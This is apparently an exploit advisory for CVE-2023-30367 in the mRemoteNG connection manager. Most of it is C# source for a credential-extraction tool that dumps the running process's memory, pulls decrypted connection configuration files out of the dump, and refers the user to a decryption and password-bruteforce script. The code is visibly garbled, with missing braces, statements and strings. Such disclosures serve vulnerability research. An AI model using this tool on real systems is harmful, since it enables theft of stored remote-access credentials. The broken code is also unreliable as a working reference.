Authored by Maximilian Barz

mRemoteNG version exploit that extracts sensitive information that is stored in memory in the clear but encrypted at rest.

advisories | CVE-2023-30367

# Exploit Title: mRemoteNG v1.77.3.1784-NB - Cleartext Storage of Sensitive Information in Memory
# Google Dork: -
# Date: 21.07.2023
# Exploit Author: Maximilian Barz
# Vendor Homepage:
# Software Link:
# Version: mRemoteNG <= v1.77.3.1784-NB
# Tested on: Windows 11
# CVE : CVE-2023-30367

Multi-Remote Next Generation Connection Manager (mRemoteNG) is free software that enables users to
store and manage multi-protocol connection configurations to remotely connect to systems.

mRemoteNG configuration files can be stored in an encrypted state on disk. mRemoteNG version <= v1.76.20 and <= 1.77.3-dev
loads configuration files in plain text into memory (after decrypting them if necessary) at application start-up,
even if no connection has been established yet. This allows attackers to access contents of configuration files in plain text
through a memory dump and thus compromise user credentials when no custom password encryption key has been set.
This also bypasses the connection configuration file encryption setting by dumping already decrypted configurations from memory.
Full Exploit and mRemoteNG config file decryption + password bruteforce python script:

using System;
using System.Collections;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
using System.Text.RegularExpressions;

namespace mRemoteNGDumper
public static class Program

public enum MINIDUMP_TYPE
MiniDumpWithFullMemory = 0x00000002

[StructLayout(LayoutKind.Sequential, Pack = 4)]
public uint ThreadId;
public IntPtr ExceptionPointers;
public int ClientPointers;

static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);

static extern bool MiniDumpWriteDump(IntPtr hProcess, uint ProcessId, SafeHandle hFile, MINIDUMP_TYPE DumpType, ref MINIDUMP_EXCEPTION_INFORMATION ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam);

static void Main(string[] args)
string input;
bool configfound = false;
StringBuilder filesb;
StringBuilder linesb;
List<string> configs = new List<string>();

Process[] localByName = Process.GetProcessesByName("mRemoteNG");

if (localByName.Length == 0) {
Console.WriteLine("[-] No mRemoteNG process was found. Exiting");
string assemblyPath = Assembly.GetEntryAssembly().Location;
Console.WriteLine("[+] Creating a memory dump of mRemoteNG using PID {0}.", localByName[0].Id);
string dumpFileName = assemblyPath + "_" + DateTime.Now.ToString("") + ".dmp";
FileStream procdumpFileStream = File.Create(dumpFileName);

// A full memory dump is necessary in the case of a managed application, other wise no information
// regarding the managed code will be available
MINIDUMP_TYPE DumpType = MINIDUMP_TYPE.MiniDumpWithFullMemory;
MiniDumpWriteDump(localByName[0].Handle, (uint)localByName[0].Id, procdumpFileStream.SafeFileHandle, DumpType, ref info, IntPtr.Zero, IntPtr.Zero);

filesb = new StringBuilder();
Console.WriteLine("[+] Searching for configuration files in memory dump.");
using (StreamReader reader = new StreamReader(dumpFileName))
while (reader.Peek() >= 0)
input = reader.ReadLine();
string pattern = @"(<Node)(.*)(?=/>)/>";
Match m = Regex.Match(input, pattern, RegexOptions.IgnoreCase);
if (m.Success)
configfound = true;

foreach (string config in m.Value.Split('>'))


if (configfound)
string currentDir = System.IO.Directory.GetCurrentDirectory();
string dumpdir = currentDir + "/dump";
if (!Directory.Exists(dumpdir))

string savefilepath;
for (int i =0; i < configs.Count;i++)
if (!string.IsNullOrEmpty(configs[i]))
savefilepath = currentDir + "dumpextracted_Configfile_mRemoteNG_" + i+"_" + DateTime.Now.ToString("") + "_confCons.xml";
Console.WriteLine("[+] Saving extracted configuration file to: " + savefilepath);
using (StreamWriter writer = new StreamWriter(savefilepath))
Console.WriteLine("[+] Done!");
Console.WriteLine("[+] Deleting memorydump file!");
Console.WriteLine("[+] To decrypt mRemoteNG configuration files and get passwords in cleartext, execute: mremoteng_decrypt.pyrn Example: python3 -rf ""+ currentDir + "dumpextracted_Configfile_mRemoteNG_0_" + DateTime.Now.ToString("") + "_confCons.xml"" );
Console.WriteLine("[-] No configuration file found in memorydump. Exiting");
Console.WriteLine("[+] Deleting memorydump file!");